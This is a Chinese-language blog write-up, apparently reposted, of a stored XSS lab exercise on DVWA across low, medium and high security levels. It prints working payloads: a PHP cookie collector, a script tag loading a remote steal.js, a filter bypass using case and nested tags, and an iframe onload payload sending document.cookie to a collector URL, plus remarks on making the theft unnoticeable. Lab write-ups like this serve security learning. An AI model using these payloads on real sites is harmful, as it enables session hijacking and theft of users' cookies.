【DVWA(五)】XXS存储型跨站攻击
XSS存儲(chǔ)型跨站攻擊(Stored Cross Site Scripting)
前言:
相較于XSS反射型跨站攻擊,存儲(chǔ)型具有更嚴(yán)重的危害,如果在竊取信息的同時(shí)對(duì)網(wǎng)頁沒有任何變化,那受害者將很難發(fā)現(xiàn)。
如果我有寫的不太明白的地方,可以先看看之前XSS反射型跨站攻擊的隨筆
low:
1.觀察:
測試輸入模式,有兩個(gè)輸入框,經(jīng)測試,都有輸入限制,這個(gè)限制用網(wǎng)頁查看器很容易解決,我給改成了1000,其實(shí)不改也可以,就是在message里輸入payload也可以的;
2.輸入:
alert測試
<script>alert("test")</script>3.刷新:
此時(shí)已經(jīng)將有攻擊的腳本數(shù)據(jù)傳到數(shù)據(jù)庫了,刷新之后就會(huì)彈出alert,觸發(fā)xss!
這就是存儲(chǔ)型XSS攻擊的厲害之處了,只要任何人訪問此網(wǎng)址,都會(huì)觸發(fā),因此比反射型更加嚴(yán)重!
現(xiàn)在clear掉數(shù)據(jù)庫信息,開始正式進(jìn)行攻擊。
4.php代碼:
在www里新建php文件,用于偷取cookie:
<?php$cookie=$_GET['cookie']; file_put_contents('get_low_dvwa_cookie.txt',$cookie);?>5.構(gòu)造JS代碼:
這次采取與反射型不同的方式,不在輸入框里直接輸入js代碼段,而是在www下寫腳本文件,然后利用標(biāo)簽加載網(wǎng)址對(duì)應(yīng)的js代碼
新建JS文件steal.js:
6.XSS攻擊加載JS代碼:
構(gòu)造payload:
name:<script src="http://127.0.0.1/steal.js"></script>
message:steal
提交之后可以看見,界面跳轉(zhuǎn)了,說明攻擊成功
7.隱蔽:
現(xiàn)在攻擊成功,但是跳轉(zhuǎn)界面容易讓用戶懷疑,所以進(jìn)一步調(diào)整,盡量隱蔽,能夠不引起直觀變化的情況下進(jìn)行攻擊獲取cookie。
利用ajax,在不刷新的情況下偷取cookie!挖坑XD
medium:
用大小寫組合,繞過對(duì)于<script>的處理:
<SCRIPT> <scr<script>ipt>接下來和low一樣了。其實(shí)這里跟反射型的XSS大同小異。
high:
1.用alert嘗試
不行
2.用大小寫組合嘗試
不行
3.換標(biāo)簽
用?<iframe onload=alert("test")>?測試,可行!
4.構(gòu)造payload:
name:<iframe οnlοad=document.location='http://127.0.0.1/get_low_dvwa_cookie.php?cookie='+document.cookie>
message:steal
成功!
impossible:
暫時(shí)依舊無解
后記
因?yàn)槭谴鎯?chǔ)型,所以測試的時(shí)候會(huì)出現(xiàn),一直跳轉(zhuǎn)的情況,所以在后臺(tái)把記錄刪掉就好了。
然后是合天網(wǎng)安相關(guān)部分的兩個(gè)思考:
1)反射型跨站和存儲(chǔ)型跨站的區(qū)別和利用方法的不同?
反射型是偏向?qū)崟r(shí)的,點(diǎn)對(duì)點(diǎn)的最有效,把鏈接發(fā)送給某個(gè)人,這樣最好了;然后存儲(chǔ)型是大范圍撒網(wǎng),一旦形成了攻擊,存進(jìn)了數(shù)據(jù)庫,就有大把的數(shù)據(jù)了!
2)如何結(jié)合CSRF漏洞攻擊?
暫時(shí)還沒搞這部分,留坑
轉(zhuǎn)載于:https://www.cnblogs.com/wayne-tao/p/11079859.html
總結(jié)
以上是生活随笔為你收集整理的【DVWA(五)】XXS存储型跨站攻击的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 01_Python
- 下一篇: Event-based Vision: